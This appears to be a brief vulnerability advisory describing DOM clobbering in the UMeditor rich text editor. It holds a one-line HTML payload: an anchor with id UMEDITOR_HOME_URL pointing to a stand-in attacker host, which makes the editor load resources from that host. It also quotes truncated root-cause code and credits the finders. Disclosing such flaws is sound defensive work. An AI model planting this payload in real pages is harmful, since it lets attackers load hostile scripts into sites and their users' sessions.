UMeditor, referred to as UM, is a simplified version of ueditor. It is an online rich text editor specially customized to meet the needs of portal websites for simple post boxes and reply boxes.
The UMeditor library was relying on the #UMEDITOR_HOME_URL
anchor to configure its base URL for loading resources. By clobbering it, it was possible to load arbitrary ressources.
<a id="UMEDITOR_HOME_URL" href="http://attacker/"></a>
Root Cause
var URL = window.UMEDITOR_HOME_URL ||
window.UMEDITOR_CONFIG = {
//为编辑器实例添加一个路径,这个不能被注释
UMEDITOR_HOME_URL : URL
Related links:
Found by jackfromeast, ishmeals.